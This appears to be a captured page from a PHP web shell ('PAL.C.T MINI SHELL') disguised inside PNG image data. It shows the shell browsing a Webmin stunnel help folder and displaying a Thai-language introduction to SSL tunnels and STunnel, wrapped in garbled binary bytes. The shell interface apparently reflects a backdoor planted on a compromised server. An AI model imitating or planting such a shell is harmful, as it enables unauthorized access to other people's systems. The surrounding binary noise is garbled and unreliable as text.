php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.th.auto.html

<header> รู้เบื้องต้นเกี่ยวกับอุโมงค์ SSL </header> SSL เป็นโปรโตคอลสำหรับเข้ารหัสข้อมูลในการเชื่อมต่อ TCP ขณะเดินทางผ่านเครือข่าย เดิมได้รับการพัฒนาเพื่อป้องกันการรับส่งข้อมูลระหว่างเว็บเบราว์เซอร์และเซิร์ฟเวอร์ แต่สามารถใช้เพื่อเข้ารหัสสตรีมข้อมูลชนิดใดก็ได้ที่ปกติจะส่งผ่านโปรโตคอล TCP <p> โปรโตคอล SSL อนุญาตให้ไคลเอนต์และเซิร์ฟเวอร์รับรองความถูกต้องซึ่งกันและกันเพื่อให้ลูกค้ามั่นใจได้ว่ามันกำลังเชื่อมต่อกับโฮสต์ที่คิดว่าเป็นจริง โดยใช้ใบรับรองที่ออกโดยหน่วยงานออกใบรับรองที่ลูกค้ารู้จัก (เพื่อให้สามารถตรวจสอบได้) และเชื่อมโยงกับชื่อโฮสต์เฉพาะ หากไม่มีใบรับรองผู้โจมตีสามารถส่งการเชื่อมต่อ SSL ไปยังเซิร์ฟเวอร์ของเขาอีกครั้งและจับข้อมูลที่ละเอียดอ่อนจากไคลเอนต์ที่คิดว่ากำลังพูดคุยกับเซิร์ฟเวอร์จริง <p> ข้อมูลใด ๆ ที่เดินทางผ่านอินเทอร์เน็ตที่ไม่เข้ารหัสสามารถถูกจับและอ่านโดยผู้โจมตีที่สามารถเข้าถึงเครือข่ายใดเครือข่ายหนึ่งที่ผ่าน แม้แต่ข้อมูลที่เดินทางระหว่างไคลเอนต์และระบบเซิร์ฟเวอร์บน LAN ก็สามารถฟังได้อย่างง่ายดาย เมื่อคุณเชื่อมต่อกับ telnet, FTP หรือเซิร์ฟเวอร์ POP3 รหัสผ่านของคุณจะถูกส่งผ่านเครือข่ายและผู้โจมตีสามารถจับได้ <p> SSL สามารถใช้เพื่อปกป้องข้อมูลในสถานการณ์เช่นนี้ได้ แต่ถ้าทั้งลูกค้าและเซิร์ฟเวอร์รองรับ เว็บเบราว์เซอร์และโปรแกรมรับส่งเมลส่วนใหญ่สามารถทำการเชื่อมต่อ HTTP, POP3 และ IMAP ที่เข้ารหัส SSL ได้ แต่เซิร์ฟเวอร์เว็บและ POP3 ทั้งหมดไม่สามารถยอมรับได้ โดยเฉพาะอย่างยิ่ง POP3 นั้นยากต่อการป้องกันเนื่องจากเซิร์ฟเวอร์มาตรฐานที่มาพร้อมกับระบบ Unix ส่วนใหญ่ไม่รองรับ SSL เลย โชคดีที่มีวิธีแก้ปัญหา - STunnel <p> STunnel เป็นโปรแกรมอย่างง่ายที่แปลงการเชื่อมต่อที่ไม่ได้เข้ารหัสเป็น SSL ที่เข้ารหัส โดยทั่วไปแล้วจะมีการตั้งค่าให้เรียกใช้จากซุปเปอร์เซิร์ฟเวอร์เช่น inetd หรือ xinetd จากนั้นเรียกใช้โปรแกรมอื่นเช่นเซิร์ฟเวอร์ POP3 ที่ไม่รองรับ SSL การออกแบบนี้ช่วยให้สามารถปกป้องเซิร์ฟเวอร์ใด ๆ ที่เรียกใช้จาก inetd เช่น telnet, NNTP และเซิร์ฟเวอร์ IMAP <p> เซิร์ฟเวอร์บางแห่งอาจไม่ได้รับการปกป้องด้วยการเข้ารหัสเนื่องจากมีไคลเอ็นต์ที่ไม่มีให้ใช้ในโหมด SSL ตัวอย่างเช่นฉันไม่เคยได้ยิน telnet หรือไคลเอนต์ FTP ที่สามารถใช้ SSL ได้เนื่องจากแพคเกจ SSH ทั่วไปแล้วอนุญาตให้เข้าสู่ระบบจากระยะไกลเข้ารหัสและถ่ายโอนไฟล์ <p> โมดูล Webmin นี้ทำให้ง่ายต่อการติดตั้ง super-server services ที่รัน STunnel เพื่อเริ่มโปรแกรมเซิร์ฟเวอร์บางตัว แม้ว่าสิ่งนี้สามารถทำได้ด้วยตนเองโดยใช้โมดูลบริการอินเทอร์เน็ต แต่อันนี้ถูกออกแบบมาโดยเฉพาะสำหรับการตั้งค่าและการกำหนดค่า STunnel ตรวจพบโดยอัตโนมัติหากคุณติดตั้ง inetd และ / หรือ xinetd อ่านการกำหนดค่าของพวกเขาเพื่อตรวจสอบช่องสัญญาณ SSL ที่มีอยู่และเพิ่มลงไปเมื่อสร้างอุโมงค์ใหม่ หากมีการติดตั้งทั้งคู่อุโมงค์ SSL ใหม่จะถูกเพิ่มเข้ากับการกำหนดค่า xinetd เนื่องจากเป็นความเหนือชั้นของทั้งสองในความคิดของฉัน <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`